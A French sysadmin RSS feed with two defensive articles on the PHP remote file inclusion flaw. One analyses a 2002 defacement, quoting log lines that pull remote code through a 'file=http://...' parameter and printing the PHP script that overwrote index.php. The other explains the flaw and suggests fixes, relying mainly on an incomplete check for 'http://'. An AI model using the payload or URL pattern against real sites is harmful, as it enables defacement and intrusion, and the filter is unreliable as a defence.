<?xml 
version="1.0" encoding="utf-8"?>
<rss version="2.0" 
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
>

<channel xml:lang="fr">
	<title>Bienvenue sur le site admin-sys</title>
	<link>http://www.admin-sys.org/</link>
	<description>Bienvenu sur le site admin-sys.</description>
	<language>fr</language>
	<generator>SPIP - www.spip.net (Sarka-SPIP)</generator>

	<image>
		<title>Bienvenue sur le site admin-sys</title>
		<url>https://admin-sys.org/local/cache-vignettes/L144xH55/siteon0-02f93.png?1694605449</url>
		<link>http://www.admin-sys.org/</link>
		<height>55</height>
		<width>144</width>
	</image>



 
	<item xml:lang="fr">
		<title>Analyse d'un hacking</title>
		<link>https://admin-sys.org/?analyse-d-un-hacking</link>
		<guid isPermaLink="true">https://admin-sys.org/?analyse-d-un-hacking</guid>
		<dc:date>2009-04-22T14:53:08Z</dc:date>
		<dc:format>text/html</dc:format>
		<dc:language>fr</dc:language>
		<dc:creator>Jerome ROBERT</dc:creator>



		<description>
&lt;p&gt;Analyse d'un hacking ... Analyse de votre fichier de log de votre serveur WEB : grep 'file=http' access_log #nom de votre fichier de log #2.147.105.2#8 - - [31/Dec/2002:14:11:18 +0100] &#034;GET /linux/index.php ?file=http://#####.sui#zer0.###/hack HTTP/1.1&#034; 200 1430 &#034;-&#034; &#034;Mozilla/4.0 (compatible ; MSIE 6.0 ; Windows NT 5.1)&#034; #2.147.105.2#8 - - [31/Dec/2002:14:11:30 +0100] &#034;GET / HTTP/1.1&#034; 200 3869 (&#8230;)&lt;/p&gt;


-
&lt;a href="https://admin-sys.org/?-include-php-" rel="directory"&gt;include php&lt;/a&gt;


		</description>


 <content:encoded>&lt;div class='rss_texte'&gt;&lt;br&gt; &lt;H1 ALIGN=CENTER&gt;Analyse d'un hacking ...&lt;/H1&gt; &lt;P&gt;&lt;BR&gt;&lt;BR&gt; &lt;/P&gt; &lt;H3&gt;Analyse de votre fichier de log de votre serveur WEB:&lt;/H3&gt; &lt;P&gt;grep 'file=http' access_log #nom de votre fichier de log&lt;/P&gt; &lt;TABLE WIDTH=100% BORDER=1 CELLPADDING=4 CELLSPACING=3 STYLE=&#034;page-break-inside: avoid&#034;&gt; &lt;COL WIDTH=256*&gt; &lt;THEAD&gt; &lt;TR&gt; &lt;TD WIDTH=100% VALIGN=TOP&gt; &lt;P&gt;#2.147.105.2#8 - - [31/Dec/2002:14:11:18 +0100] &#034;GET /linux/index.php?file=http://#####.sui#zer0.###/hack HTTP/1.1&#034; 200 1430 &#034;-&#034; &#034;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)&#034; &lt;/P&gt; &lt;P&gt;#2.147.105.2#8 - - [31/Dec/2002:14:11:30 +0100] &#034;GET / HTTP/1.1&#034; 200 3869 &#034;http://www.admin-sys.com/linux/index.php?file=http://#####.sui#zer0.###/hack&#034; &#034;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)&#034; &lt;/P&gt; &lt;/TD&gt; &lt;/TR&gt; &lt;/THEAD&gt; &lt;/TABLE&gt; &lt;P&gt;&lt;BR&gt;&lt;BR&gt; &lt;/P&gt; &lt;P&gt;Les # sont la pour respecter le hackeur ....&lt;/P&gt; &lt;P&gt;&lt;BR&gt;&lt;BR&gt; &lt;/P&gt; &lt;H3&gt;Analyse du r&#233;sultat:&lt;/H3&gt; &lt;P&gt;Nous avons @IP de la machine qui a servi a faire le hack: &lt;B&gt;#2.147.105.2#8&lt;/B&gt;&lt;/P&gt; &lt;P &gt;Nous avons le site qui a aider a faire le hack: &lt;B&gt;http://#####.sui#zer0.###/&lt;/B&gt;&lt;/P&gt; &lt;P &gt;&lt;BR&gt;&lt;BR&gt; &lt;/P&gt; &lt;P &gt;Avec &lt;B&gt;#2.147.105.2#8 &lt;/B&gt;&lt;SPAN STYLE=&#034;font-weight: medium&#034;&gt;et&lt;/SPAN&gt;&lt;B&gt; &lt;/B&gt;les outils qui se trouvent dans &#171; http//:www.admin-sys.com/reseaux/outils/ &#187; Et en choisissent &#171; Qui est le propri&#233;taire de cette Adresse IP &#187; Cela va vous permet de trouver le propri&#233;taire de l'adresse IP donc le &#171; provider &#187; ( free, aol, ... ), avec l'heure, il est possible de contacter le responsable technique ,pour que ce dernier recherche dans ces logs des compl&#233;ments informations qui seront utiles lors de la proc&#233;dure judiciaires. ( s'il y a eu de gros probl&#232;mes ...)&lt;/P&gt; &lt;P &gt;Avec &lt;B&gt;http://#####.sui#zer0.###/ &lt;/B&gt;il est possible de conna&#238;tre le responsable de ce domaine et demander des comptes sur l'un de ces comptes, car le site &#224; pu &#234;tre aussi pirater ...&lt;/P&gt; &lt;H2&gt;&lt;B&gt;&lt;U&gt;Attention&lt;/U&gt;&lt;/B&gt;: &lt;/H2&gt; &lt;P &gt;On peut obtenir beaucoup d'information, mais &lt;B&gt;on ne sais pas&lt;/B&gt; si c'est vraiment le &lt;U&gt;hackeur&lt;/U&gt; ou un &lt;U&gt;pigeon&lt;/U&gt; (victime d'un piratage).... Surtout s'il vient d'une machine WINDOWS .... &lt;/P&gt; &lt;P &gt;&lt;BR&gt;&lt;BR&gt; &lt;/P&gt; &lt;h2 &gt;Soyez tr&#232;s prudent est regarder vos LOGs .....&lt;/h2&gt; &lt;P &gt;&lt;BR&gt;&lt;BR&gt; &lt;/P&gt; &lt;P &gt;Voici les sources dans fichier de HACK ... &lt;/P&gt; &lt;P STYLE=&#034;margin-bottom: 0cm; font-weight: medium&#034;&gt;&lt;?php echo &#034;en cours...&lt;BR&gt;&#034;; $f = fopen(&#034;index.php&#034;, &#034;w&#034;); echo &#034;Ouvert...&lt;BR&gt;&#034;; $data = &#034;&lt;?php if(\$rub){header(\&#034;location: _index.php?rub=\&#034;.\$rub);exit;} ?&gt; &lt;/P&gt; &lt;PRE&gt; __ __ _______ ______ __ __ _______ _____ ____ __ __ / / / / / ___ / / ____/ / / / / / _____/ / ___ \ / __ \ | | / / / /__/ / / /__/ / / / / /__/ / / /___ / / / / / /_/ / | |/ / / ___ / / ___ / / / / ___ &lt; / ____/ / / / / / __ &lt; | / / / / / / / / / / /___ / / | | / /____ / /__/ / / /_/ / / / /_/ /_/ /_/ /_/ /_____/ /_/ |_| /______/ /______/ /_____/ /_/ &lt;/PRE&gt;&lt;H1&gt; # &lt;/H1&gt; &lt;P&gt;&lt;BR&gt;&lt;BR&gt;Ce site n'est pas mal, sauf une ch'tite faille de s&#233;curit&#233; &#224; boucher...&lt;BR&gt;&lt;BR&gt;Monsieur l'admin, voyez le mail que je vous ai envoy&#233; pour les d&#233;tails et la correction de la faille...&lt;BR&gt;&lt;BR&gt;Sur ce, faites tous attention &#224; la s&#233;curit&#233; de vos serveurs et de vos r&#233;seaux, car il y aura toujours un hacker&lt;BR&gt;pour trouver les failles de vos b&#233;canes, et certains n'ont pas des intentions aussi bienv&#233;illantes que les miennes ;)&lt;BR&gt;On dit merci qui ? merci e ! ;o)&lt;BR&gt;&lt;BR&gt;Par ici l'entr&#233;e... et bonne ann&#233;e !&lt;/P&gt; &lt;P STYLE=&#034;margin-bottom: 0cm&#034;&gt;e - le 31/12/2002 (oui je sais mon ASCII il est moche...)&lt;/P&gt; &lt;P STYLE=&#034;margin-bottom: 0cm&#034;&gt;&#034;; echo &#034;Pret &#224; ecrire...&lt;BR&gt;&#034;; fputs($f, $data); echo &#034;Ecrit...&lt;BR&gt;&#034;; fclose($f); echo &#034;&lt;B&gt;H@cked by e&lt;/B&gt;&lt;BR&gt;&#034;; ?&gt; &lt;/P&gt;&lt;/div&gt;
		
		</content:encoded>


		

	</item>
	<item xml:lang="fr">
		<title>faille include</title>
		<link>https://admin-sys.org/?faille-include</link>
		<guid isPermaLink="true">https://admin-sys.org/?faille-include</guid>
		<dc:date>2009-04-22T14:52:19Z</dc:date>
		<dc:format>text/html</dc:format>
		<dc:language>fr</dc:language>
		<dc:creator>Jerome ROBERT</dc:creator>



		<description>
&lt;p&gt;auteur : e Et si votre site contenait une grosse faille de s&#233;curit&#233; : la faille include de php ???? Si vous avez des liens du type : http://www.site.com/linux/index.php?file=intro.php Alors pas probl&#232;me ... Le probl&#232;me est qu'il n'y a peut &#234;tre pas de v&#233;rification sur $page avant l'include... donc si on fait http://www.site.com/linux/index.php?file=http://mon_site/hack et si le fichier hack sur mon site contient du code comme : &lt; ?php $f=fopen(&#034;index.php&#034;, (&#8230;)&lt;/p&gt;


-
&lt;a href="https://admin-sys.org/?-include-php-" rel="directory"&gt;include php&lt;/a&gt;


		</description>


 <content:encoded>&lt;div class='rss_texte'&gt;&lt;center&gt;
&lt;p&gt;auteur : &lt;b&gt; e&lt;/b&gt;&lt;/p&gt;
&lt;/center&gt;
&lt;BR&gt;
&lt;H3&gt;Et si votre site contenait une grosse faille de s&#233;curit&#233; : la faille include de php ????&lt;/H3&gt;
&lt;BR&gt;
&lt;p STYLE=&#034;margin-bottom: 0cm&#034;&gt;Si vous avez des liens du type :&lt;/p&gt;
&lt;BR&gt;
&lt;p STYLE=&#034;margin-bottom: 0cm&#034;&gt;&lt;a href=&#034;http://www.site.com/linux/index.php?file=intro.php&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;http://www.site.com/linux/index.php?file=intro.php&lt;/a&gt;&lt;/p&gt;
&lt;BR&gt;
&lt;p STYLE=&#034;margin-bottom: 0cm&#034;&gt;Alors pas probl&#232;me ...&lt;/p&gt;
&lt;p STYLE=&#034;margin-bottom: 0cm&#034;&gt;Le probl&#232;me est qu'il n'y a peut&lt;br class='autobr' /&gt;
&#234;tre pas de v&#233;rification sur $page avant l'include...&lt;/p&gt;
&lt;p STYLE=&#034;margin-bottom: 0cm&#034;&gt;donc si on fait&lt;br class='autobr' /&gt;
&lt;a href=&#034;http://www.site.com/linux/index.php?file=http://mon_site/hack&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;http://www.site.com/linux/index.php?file=http://mon_site/hack&lt;/a&gt;&lt;/p&gt;
&lt;p STYLE=&#034;margin-bottom: 0cm&#034;&gt;et si le fichier hack sur mon site&lt;br class='autobr' /&gt;
contient du code comme :&lt;/p&gt;
&lt;BR&gt;
&lt;p STYLE=&#034;margin-bottom: 0cm&#034;&gt;&lt; ?php&lt;/p&gt;
&lt;p STYLE=&#034;margin-bottom: 0cm&#034;&gt;$f=fopen(&#034;index.php&#034;, &#034;w&#034;) ;&lt;/p&gt;
&lt;p STYLE=&#034;margin-bottom: 0cm&#034;&gt;...&lt;/p&gt;
&lt;p STYLE=&#034;margin-bottom: 0cm&#034;&gt; ?&gt;&lt;/p&gt;
&lt;BR&gt;
&lt;p STYLE=&#034;margin-bottom: 0cm&#034;&gt;On est capable d'&#233;crire sur&lt;br class='autobr' /&gt;
l'index...&lt;/p&gt;
&lt;p STYLE=&#034;margin-bottom: 0cm&#034;&gt;Pour boucher cette faille, il fait&lt;br class='autobr' /&gt;
faire des tests sur $page.&lt;/p&gt;
&lt;BR&gt;
&lt;p STYLE=&#034;margin-bottom: 0cm&#034;&gt;Si vous n'incluez que des fichiers php,&lt;br class='autobr' /&gt;
vous pouvez faire include($page.&#034;.php&#034;) comme &#231;a les&lt;br class='autobr' /&gt;
liens seront :&lt;/p&gt;
&lt;BR&gt;
&lt;p STYLE=&#034;margin-bottom: 0cm&#034;&gt;&lt;a href=&#034;http://www.site.com/linux/index.php?file=intro&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;http://www.site.com/linux/index.php?file=intro&lt;/a&gt;&lt;/p&gt;
&lt;BR&gt;
&lt;p STYLE=&#034;margin-bottom: 0cm&#034;&gt;Dans tous les cas, il faut ABSOLUMENT&lt;br class='autobr' /&gt;
refuser les $page contenant &#034;http://&#034; ou &#034;www&#034;&lt;br class='autobr' /&gt; !!!! pour &#233;viter l'include &#224; distance.&lt;/p&gt;
&lt;p STYLE=&#034;margin-bottom: 0cm&#034;&gt;Il existe bien d'autres m&#233;thodes&lt;br class='autobr' /&gt;
de protection, je vous revoie sur internet, recherchez &#034;faille&lt;br class='autobr' /&gt;
include php protection&#034; dans google...&lt;/p&gt;
&lt;p STYLE=&#034;margin-bottom: 0cm&#034;&gt;Cette faille est tr&#232;s sensible,&lt;br class='autobr' /&gt;
car on peut acc&#233;der &#224; toutes les sources de vos&lt;br class='autobr' /&gt;
fichiers et y p&#233;cher des informations sensibles comme vos mots&lt;br class='autobr' /&gt;
de passe mysql par exemple, ou obtenir TOUTE votre base de donn&#233;e,&lt;br class='autobr' /&gt;
donc sur un site marchand toutes les informations des personnes&lt;br class='autobr' /&gt;
enregistr&#233;es (login, mot de passe, email, etc...).&lt;/p&gt;
&lt;BR&gt;
&lt;BR&gt;
&lt;p STYLE=&#034;margin-bottom: 0cm&#034;&gt;Un exemple de teste a faire avant&lt;br class='autobr' /&gt;
d'effectuer un include :&lt;/p&gt;
&lt;BR&gt;
&lt;p STYLE=&#034;margin-bottom: 0cm&#034;&gt;if (strstr($file, &#034;http://&#034;))&lt;br class='autobr' /&gt;
$file=&#034;index.php&#034; ;&lt;/p&gt;
&lt;BR&gt;&lt;/div&gt;
		
		</content:encoded>


		

	</item>


 
	


 
	

</channel>
</rss>
